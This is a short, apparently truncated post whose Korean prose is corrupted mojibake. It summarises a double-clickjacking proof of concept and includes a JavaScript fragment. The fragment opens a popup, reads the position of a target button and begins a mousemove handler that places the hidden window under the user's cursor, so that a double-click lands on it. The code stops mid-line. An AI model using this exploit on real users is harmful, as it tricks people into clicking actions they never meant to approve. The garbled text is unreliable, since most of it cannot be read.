์์ฝ์ฃผ์ : ๋ค์ํ ๋ธ๋ผ์ฐ์ ํธ๋ฆญ์ ๊ฒฐํฉํด “๋๋ธ ํด๋ฆญ์ฌํน(Double-Clickjacking)” ๊ณต๊ฒฉ์ ์๋ฒฝํ PoC๋ก ๊ตฌํํต์ฌ ์์ด๋์ด๋นํ์ฑ ํ์ ์ฐฝ ์์น ์ ์ด : window.movTo๋ก ๋์ ๋ณด์ด์ง ์๋ ํ์ ์ ๋ง์ฐ์ค ์ปค์ ๋ฐ๋ก ์๋๋ก ์ฎ๊นonclick = () => { onclick = null; w = window.open("/popup.html", "", "width=500,height=300"); w.onload = () => { navbarHeight = w.outerHeight - w.innerHeight; button = w.document.querySelector("button").getBoundingClientRect(); onmousemove = (e) => {..